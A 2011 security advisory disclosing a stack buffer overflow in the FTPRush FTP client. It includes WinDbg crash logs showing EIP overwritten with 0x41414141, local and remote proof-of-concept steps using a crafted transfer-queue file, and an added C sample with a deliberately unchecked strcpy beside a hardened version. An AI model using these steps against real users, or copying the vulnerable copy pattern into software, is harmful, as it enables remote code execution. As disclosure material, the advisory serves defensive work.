FTPRush v1.1.3 - Stack Buffer Overflow Vulnerability

2011-06-16T00:00:00
ID VULNERLAB:54
Type vulnerlab
Reporter Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
Modified 2011-06-16T00:00:00

Description

Document Title:
===============
FTPRush v1.1.3 - Stack Buffer Overflow Vulnerability


References (Source):
====================
http://www.youtube.com/watch?v=Fxr35RAcaUA


Release Date:
=============
2011-06-16


Vulnerability Laboratory ID (VL-ID):
====================================
54


Product & Service Introduction:
===============================
As the most up-to-date solution in FTP transfer, FTPRush is not just a fast, reliable, powerful and easy-to-use FTP program for 
Microsoft Windows; it is a full-featured FXP client with secure SSL/TLS encryption too. It allows you to transfer files from local 
to server, server to local or server to server. It allows you to fully customize the user interface on-the-fly. It allows you to 
create your own FTP scripts to do automatic jobs.

 Operating Systems: Windows® 98/Me/NT4.0/2000/XP/2003/VISTA
 Tabbed Interface for smooth control over multiple active connections
 GUI Runtime Customization and Integrated Docking; spice up the look of it all with your own style or favorites such as MS Office® 2000/XP/2003
 Drag-And-Drop files via Explorer-like interface
 Easiest way to FXP files from one server to another
 Faster than other FTP clients at downloading or uploading files
 Built-in Task Manager for you to easily schedule all kinds of jobs.
 Allows setting listing/downloading/uploading FTP accounts individually for one site and switching between them automatically
 On-The-Fly Compression saves your bandwidth
 Offers FTP MLSD to give more accurate directory listings and synchronize folders
 UPnP Port-Mapping enables the FTP client to accept incoming connections from the server
 Multi-Language support makes the FTP Client easily translatable to your native language if it's not already done
 HTTP Proxy, FTP Proxy, Socks 4 & 5 support; create different proxies and switch between them with a simple mouse click 

The FTPRush software is one of the most used in the flasher, downloader and FXP scenes and has won several awards on various well-known vendor websites.


(Copy of the Vendor Homepage: http://www.ftprush.com/product-ftprush.html)


Abstract Advisory Information:
==============================
The Vulnerability-Lab team discovered a stack buffer overflow vulnerability in FTPRush, a widely used FTP client/server software.
A remote attacker is able to overwrite ECX and EIP. No validation checks are performed on the length of the file endings on transfer. 
By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code.


Vulnerability Disclosure Timeline:
==================================
2010-08-03:	Vendor Notification
2010-12-01:	Vendor Response/Feedback
2011-06-03:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A stack-based buffer overflow vulnerability was detected in the FTPRush software. The length of the file ending string taken from a 
transfer queue entry is not validated; by passing in a long file ending string, it is possible to trigger a stack-based buffer 
overflow, resulting in the execution of arbitrary code.
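The unchecked copy the advisory describes, shown as an added C illustration beside a hardened form. This is not FTPRush's code: the real buffer size and parsing routine are unknown, so ENDING_BUF and all function names are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
/* Hypothetical illustration, not FTPRush's code: the advisory reports that the
 * length of the "file ending" string from a transfer queue entry is never
 * checked before it is copied into a fixed-size stack buffer, which is how a
 * run of 'A' ends up in ECX and EIP (0x41414141 in the crash log).
 * ENDING_BUF and all function names are assumptions. */
#define ENDING_BUF 32

/* Vulnerable pattern: unbounded copy of caller-controlled text into a stack
 * buffer; anything longer than ENDING_BUF - 1 bytes overruns the frame. */
size_t ending_len_unchecked(const char *ending)
{
    char buf[ENDING_BUF];
    strcpy(buf, ending);          /* no length check at all */
    return strlen(buf);
}

/* Hardened form: check length and character set, then copy with an explicit
 * bound. Returns true and NUL-terminates out[] only on success. */
bool copy_file_ending(const char *ending, char *out, size_t out_size)
{
    if (ending == NULL || out == NULL || out_size == 0)
        return false;
    size_t n = 0;                 /* bounded scan: never read past out_size */
    while (n < out_size && ending[n] != '\0')
        n++;
    if (n == 0 || n >= out_size)  /* empty, or no room for the terminator */
        return false;
    /* A file ending is alphanumerics plus '.', '_', '-'; reject everything
     * else (path separators, the '+' queue delimiter, control characters). */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)ending[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return false;
    }
    memcpy(out, ending, n);
    out[n] = '\0';
    return true;
}

/* Mirrors the original call site: parse into a fixed stack buffer and report
 * whether the queue entry's ending would be accepted. */
bool accept_queue_ending(const char *ending)
{
    char buf[ENDING_BUF];
    return copy_file_ending(ending, buf, sizeof buf);
}
```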

--- Debug Logs ---

...   ...
ModLoad: 73a30000 73a46000   C:/Windows/SysWOW64/davclnt.dll
ModLoad: 73a20000 73a28000   C:/Windows/SysWOW64/DAVHLPR.dll
ModLoad: 74d30000 74d3f000   C:/Windows/SysWOW64/wkscli.dll
ModLoad: 74d60000 74d69000   C:/Windows/SysWOW64/netutils.dll
(10e8.1504): Unknown exception - code 000006ba (first chance)
ModLoad: 68e50000 68e9e000   C:/Windows/SysWOW64/actxprxy.dll
ModLoad: 6e750000 6e988000   WPDSHEXT.dll
ModLoad: 6e750000 6e988000   C:/Windows/SysWOW64/wpdshext.dll
ModLoad: 68d90000 68e19000   C:/Windows/SysWOW64/PortableDeviceApi.dll
ModLoad: 75980000 759ad000   C:/Windows/syswow64/WINTRUST.dll
ModLoad: 74360000 7439f000   SHMEDIA.dll
ModLoad: 74360000 7439f000   C:/Windows/SysWOW64/audiodev.dll
ModLoad: 6dee0000 6e147000   C:/Windows/SysWOW64/WMVCore.DLL
ModLoad: 70d00000 70d3d000   C:/Windows/SysWOW64/WMASF.DLL
ModLoad: 72cf0000 72d21000   EhStorAPI.DLL
ModLoad: 72cf0000 72d21000   C:/Windows/SysWOW64/EhStorShell.dll
ModLoad: 66420000 66442000   C:/Windows/SysWOW64/EhStorAPI.dll
(10e8.17c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0018e700 ebx=00066d50 ecx=00019539 edx=0018e794 esi=7ee81884 edi=00190000
eip=0040f6e9 esp=0018e758 ebp=0018e994 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0xf6e9:
0040f6e9 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> gn
(10e8.17c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=77c187cd esi=00000000 edi=00000000
eip=41414141 esp=0018e338 ebp=0018e358 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246

... ...

FAULTING_IP: 
+487
41414141 ??              ???

EXCEPTION_RECORD:  41414141 -- (.exr 0x41414141)
Cannot read Exception record @ 41414141

FAULTING_THREAD:  000017c4

PROCESS_NAME:  image00400000

FAULTING_MODULE: 76670000 kernel32

DEBUG_FLR_IMAGE_TIMESTAMP:  4b6bdefa

MODULE_NAME: image00400000

ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgeführt werden.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgeführt werden.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP: 
+487
41414141 ??              ???

FAILED_INSTRUCTION_ADDRESS: 
+487
41414141 ??              ???

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your builds rebase
log at <releasedir>/bin/build_logs/timebuild/ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  41414141 -- (.cxr 0x41414141)
Unable to read context, Win32 error 0n30

ADDITIONAL_DEBUG_TEXT:  
Use !findthebuild command to search for the target build information.
If the build information is available, run !findthebuild -s ; .reload to set symbol path and load symbols. ; 
Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[ffffffff]

LAST_CONTROL_TRANSFER:  from 77c187b9 to 41414141

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE

STACK_TEXT:  
00000000 image00400000+0x0


STACK_COMMAND:  .cxr 41414141 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  image00400000

FOLLOWUP_NAME:  MachineOwner

IMAGE_NAME:  C:/Program Files (x86)/FTPRush/ftprush.exe

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE_c0000005_C:_Program_Files_(x86)_FTPRush_ftprush.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_image00400000

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/image00400000/1_1_3_0/4b6bdefa/unknown/0_0_0_0/bbbbbbb4/c0000005/41414141.htm?Retriage=1

Followup: MachineOwner

...    ...


0018e34c: ntdll!LdrRemoveLoadAsDataTable+49b (77c187cd)
0018e778: image00400000+23d7ea (0063d7ea)
0018e99c: 41414141
Invalid exception stack at 41414141


Debug Logs(ALL):
			../Debug/logs.txt 

Pictures:
			../overflow1.png
			../overflow2.png
			../overflow3.png



Proof of Concept (PoC):
=======================
This vulnerability can be exploited locally and remotely by attackers ...

Local Attack Way ...

1. Connect to any server
2. Advanced transfer > Queue as
3. Queue information > Customize
4. Then, via Customize, enter the string into the file endings field
5. EIP & ECX get overwritten by the attacker


Remote Attack Way ...

1. Install and start an FTP server
2. Let a person using FTPRush connect to the FTP server
3. Let them open the PoC transfer file with the right code segments through the queue.
4. PWN THE BOX! 62DF7CEEE7FC46CFA2B1BDB08FF770FD/ 



Test Queue: 20LokalC:\Users\Rem0ve\Desktop\update-feeds.txt62DF7CEEE7FC46CFA2B1BDB08FF770FD/AAAAAAAAAAAAAAA+
Test Queue: [Platte][Path][File][Settings]+[String].rfq


References: Transfer-Queue

				../PoC/RushCfg.xml
				../PoC/1_1015289700.rfq


Solution - Fix & Patch:
=======================
N/A


Security Risk:
==============
A remote attacker is able to overwrite ECX and EIP. No validation checks are performed on the length of the file endings on transfer. 
By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code.
The security risk of the vulnerability is estimated as critical because of the local/remote execution of arbitrary code.


Credits & Authors:
==================
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material, contact admin@vulnerability-lab.com or support@vulnerability-lab.com to get permission.

Copyright © 2012 | Vulnerability Laboratory